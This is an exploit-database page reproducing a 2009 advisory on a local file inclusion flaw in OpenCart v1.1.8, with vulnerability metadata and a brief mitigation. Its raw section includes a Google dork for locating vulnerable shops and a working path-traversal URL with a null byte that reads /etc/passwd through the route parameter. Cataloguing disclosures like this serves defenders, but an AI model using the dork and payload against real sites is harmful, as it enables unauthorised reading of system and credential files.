header-logo
Suggest Exploit
vendor:
OpenCart opencart_v1.1.8
by:
OoN_Boy
7,5
CVSS
HIGH
LFI Injection
22
CWE
Product Name: OpenCart opencart_v1.1.8
Affected Version From: OpenCart opencart_v1.1.8
Affected Version To: OpenCart opencart_v1.1.8
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Opencart Lfi Injection Vulnerability

A Local File Inclusion (LFI) vulnerability in OpenCart opencart_v1.1.8 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in the route parameter to index.php.

Mitigation:

Update to the latest version of OpenCart opencart_v1.1.8
Source

Exploit-DB raw data:

[+]=================================================================[+]
		[x]Title    : Opencart Lfi Injection Vulnerability
		[x]Software : OpenCart opencart_v1.1.8
		[x]Vendor   : http://www.opencart.com/
		[x]Date     : 25 April 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
		[x]Contact  : oon.boy9@gmail.com
		[x]Blog     : http://oonboy.blogspot.com
[+]=================================================================[+]
		[o] Vulnerable file
		
		index.php
[+]=================================================================[+]
		[x] Google Dork

		"Powered by opencart"
[+]=================================================================[+]
		[x] Exploit

		http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
[+]=================================================================[x]

[+]=================================================================[+]
		[x] Special Greetz
		
		www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - 
		Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
		zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
		str0ke, em|nem, Pandoe, Ronny 
		Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]

# milw0rm.com [2009-04-27]

Navigation

Suggest Exploit

Services By CQR